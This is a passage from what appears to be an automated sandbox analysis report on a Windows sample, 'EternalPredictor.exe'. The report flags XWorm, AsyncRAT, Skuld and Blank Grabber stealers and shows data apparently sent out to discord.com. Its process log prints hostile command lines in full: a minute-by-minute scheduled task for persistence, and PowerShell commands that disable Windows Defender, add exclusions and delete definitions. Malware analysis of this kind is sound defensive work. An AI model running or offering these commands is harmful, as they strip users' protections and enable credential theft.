                                                                                                                                                                                                                                2024-11-17 10:22:00 UTC16384OUTData Raw: d4 3f d0 e0 ab f5 9b 19 51 e9 67 6b fc 75 78 c1 b0 8f 73 03 01 d3 a7 22 93 65 8f 6f 5b e4 39 39 19 89 30 e8 4d cd f7 c3 37 28 f5 1c 01 48 4d 46 3d 0c d8 5d 7d b4 af bc 9c 88 34 1c a6 1b 87 04 ee 25 c1 3c a7 21 fc 8b 53 54 81 bc e5 ac 9f bf 93 6a 76 0d bf 90 d8 b3 a2 56 0e 79 5b 9f 0f 03 62 8d 21 f3 4e 64 0f 97 ff 8b ae 4d 65 a4 d2 f2 99 83 93 cb a1 56 38 6a 8f c2 42 1d 03 ec b6 36 c7 c5 e1 7d ae cc 7c 95 57 d5 92 df da 83 85 00 ee ca e1 63 e1 47 bf 62 83 c4 35 de 43 a5 6e 86 09 2c ae dc a2 ad 16 ee 03 f4 c7 0e b9 eb 06 a7 25 97 cb 1c e1 a2 55 cc 98 4e 42 5d f0 98 02 c1 cb f8 f9 4d 46 cc 74 93 94 8a 86 3d 8a 3c a1 23 1e 57 b4 04 26 6b fe 38 29 02 63 7c 35 21 bf a4 4c 46 ad 67 36 14 df 1d b7 2e d2 53 5d b6 e4 2d 35 92 17 4e 96 05 9a 1f 05 83 1a e9 a6 cb 6b
                                                                                                                                                                                                                                Data Ascii: ?Qgkuxs"eo[990M7(HMF=]}4%<!STjvVy[b!NdMeV8jB6}|WcGb5Cn,%UNB]MFt=<#W&k8)c|5!LFg6.S]-5Nk
                                                                                                                                                                                                                                2024-11-17 10:22:00 UTC16384OUTData Raw: 14 ba b6 bf 62 38 de 4c 7b 8f d3 9a 62 08 20 ef 96 fe f0 e6 cf 98 88 56 e4 af a0 66 65 c0 44 a0 79 a2 0a 28 7f ec 6a 69 be c2 09 d7 18 51 cc 05 23 5b 46 c7 28 11 53 62 ab dd fb 1e 9e 5f ee d3 b8 0e cd 03 79 cc 89 20 d5 4a a3 36 c7 6c 0a 06 f7 dd c6 4f af eb ad b2 7d 4c 07 8a db 2a df c8 1f 2f e4 e7 7a d9 d4 e3 f6 18 ff 97 a5 54 94 a0 80 a1 b3 44 08 e3 e7 75 cf a8 f7 0c ae 35 c5 f9 df 4a c4 5c 82 0b 99 fa 59 1c ba ed ab 44 bc 3c 2d e3 1f 47 c6 22 0c 2f 3e 63 53 b5 7c 14 41 e8 42 97 f4 de 45 38 d5 b4 2a db 75 96 03 fe ee 32 d4 51 3b 24 cb 66 fd 3d 11 30 5d c4 70 06 c2 cd ee 85 8b c4 45 25 56 e2 0c be e9 f9 cd 03 56 11 f3 66 4e 02 d7 f3 4b 55 40 b3 b2 e5 15 75 d9 28 c5 91 f3 67 bd 68 33 0f af 31 ff a5 fb 21 08 00 d7 70 6a 42 4c 90 5e 69 06 b3 b4 b1 45 9f fc
                                                                                                                                                                                                                                Data Ascii: b8L{b VfeDy(jiQ#[F(Sb_y J6lO}L*/zTDu5J\YD<-G"/>cS|ABE8*u2Q;$f=0]pE%VVfNKU@u(gh31!pjBL^iE
                                                                                                                                                                                                                                2024-11-17 10:22:00 UTC16384OUTData Raw: b3 6b eb 20 25 d9 64 43 9d e0 72 cb a5 e9 23 50 33 c9 5c 3b 79 fb ba 3b 0c 3d 35 32 9e 45 22 6f ab 6a 64 1f c1 70 84 9c 33 b8 a8 d9 b2 52 9a 7e 58 68 e3 ab 7a 8b 83 79 d6 d4 27 3d 5d 31 63 d9 d0 f9 42 b2 c1 d6 54 c6 52 dc 12 ce 7a fb 85 20 f4 6c 13 ae 9b 2b 7b a1 9a 40 7b 1e ec 11 78 bb d4 42 6b f5 7e 4e 34 56 4a da 79 5a 2e a0 70 c3 97 8b 40 d4 d2 4e 53 b7 c2 c0 44 91 e7 e8 98 38 2b f3 ff e9 6b 53 75 85 c1 48 d5 eb 3f ee 3a 87 69 14 49 cf 1e d5 7b d4 7d f7 cd 4d 99 bb b5 19 3b 52 1c fc 96 97 32 ed c4 21 23 13 29 c2 c9 92 14 e8 3f 58 dc f8 f5 20 58 76 c3 46 74 79 26 2f 60 0e c5 ff 2c 98 1c 2b 9c ca 72 88 ab ff c5 1e f0 91 bf e9 21 e9 31 6c 33 c1 65 fe 3d 04 c9 2b f5 5b c9 98 93 62 3d 78 ab e6 40 77 da a0 cc 3c 93 9a 38 81 58 4b a4 ca 24 29 8a f8 7b b2 cb
                                                                                                                                                                                                                                Data Ascii: k %dCr#P3\;y;=52E"ojdp3R~Xhzy'=]1cBTRz l+{@{xBk~N4VJyZ.p@NSD8+kSuH?:iI{}M;R2!#)?X XvFty&/`,+r!1l3e=+[b=x@w<8XK$){
                                                                                                                                                                                                                                2024-11-17 10:22:00 UTC16384OUTData Raw: ec 24 31 89 3a 88 43 b1 1b ba b5 c7 81 2f 2d 5f 70 06 62 27 a7 d1 64 14 a3 4c b1 a9 b2 31 be 0a 85 11 5b 45 a0 01 f4 54 33 90 b1 2c d3 ec 5c de 82 04 07 e6 7b 57 3c 88 50 56 c0 61 86 1f 29 58 23 d8 b2 09 8a 74 b0 65 70 14 72 8f e4 4e 9d c8 17 d7 95 1e 18 fb 82 11 44 5b 15 84 94 23 5e 61 94 c4 b8 39 4c 4b 14 6b 18 a4 c3 ad ee 3e 71 02 09 f5 5d 5e e0 2c 16 f2 be 81 f4 e4 9f c6 eb 16 1e 6b 5f 3c 1a 04 5b f4 c7 5e cd 40 b5 47 3d 0c a6 1c 6a e8 ed ee 60 3e 83 38 a1 8f ec 1d 48 f0 51 59 22 3a bc 18 1f ce 53 51 90 08 94 0f 5f 14 d7 89 54 67 02 7f 67 fc 6c a6 91 34 b7 b4 14 63 24 e9 be cd 53 13 6e 84 98 5f e9 53 51 b3 78 a8 e4 26 14 71 07 08 12 28 d4 00 60 b1 3a da 5f 76 10 3a 1e 73 94 82 46 5c e7 42 c1 12 97 08 11 a1 05 f8 44 61 b7 af 5b 58 ac e1 62 fb 0d cd c7
                                                                                                                                                                                                                                Data Ascii: $1:C/-_pb'dL1[ET3,\{W<PVa)X#teprND[#^a9LKk>q]^,k_<[^@G=j`>8HQY":SQ_Tggl4c$Sn_SQx&q(`:_v:sF\BDa[Xb
                                                                                                                                                                                                                                2024-11-17 10:22:01 UTC1253INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Sun, 17 Nov 2024 10:22:01 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                x-ratelimit-reset: 1731838922
                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAafSwTRG6Fa%2FRJMOc3VGX0BCuXUtuULCwhFeDvjsJPZAKtziv3qP5ItX77L8Jqhu6pfvcjLVPS5rCQSNjrBh6haKFe%2BMITwUEfsxI6na0mnEuRFO4eXHDTPXwff"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Set-Cookie: __cfruid=daade001e76c5346a9107562c463e493fd63bfc9-1731838921; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                Set-Cookie: _cfuvid=ycNd0d26ksQwnFyG4f9aiNkPKG6_UonCz4_PyaZrPZI-1731838921537-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8e3eff479fd14623-DFW


                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:05:21:10
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\EternalPredictor.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\EternalPredictor.exe"
                                                                                                                                                                                                                                Imagebase:0x7f0000
                                                                                                                                                                                                                                File size:18'412'032 bytes
                                                                                                                                                                                                                                MD5 hash:7D207C243B33D6F3D78ACADFFD95AE0E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:05:21:17
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\eternal.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\eternal.exe"
                                                                                                                                                                                                                                Imagebase:0xbc0000
                                                                                                                                                                                                                                File size:71'168 bytes
                                                                                                                                                                                                                                MD5 hash:7439CC991A9A756C41153B8E9121BAAB
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                Start time:05:21:17
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\skuld.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\skuld.exe"
                                                                                                                                                                                                                                Imagebase:0xcf0000
                                                                                                                                                                                                                                File size:10'375'680 bytes
                                                                                                                                                                                                                                MD5 hash:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000003.00000000.1505357195.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                Start time:05:21:18
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                                                Start time:05:21:18
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\program.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff72c650000
                                                                                                                                                                                                                                File size:7'954'796 bytes
                                                                                                                                                                                                                                MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.1524758278.00000139887E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.1524758278.00000139887E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 45%, ReversingLabs
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                Start time:05:21:19
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib +h +s C:\Users\user\AppData\Roaming\skuld.exe
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                Start time:05:21:19
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                Start time:05:21:20
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\program.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\program.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff72c650000
                                                                                                                                                                                                                                File size:7'954'796 bytes
                                                                                                                                                                                                                                MD5 hash:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1934849918.00000237A5ED6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:05:21:20
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wmic csproduct get UUID
                                                                                                                                                                                                                                Imagebase:0x7ff781d20000
                                                                                                                                                                                                                                File size:576'000 bytes
                                                                                                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:05:21:22
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff770490000
                                                                                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:05:21:22
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:05:21:23
                                                                                                                                                                                                                                Start date:17/11/2024
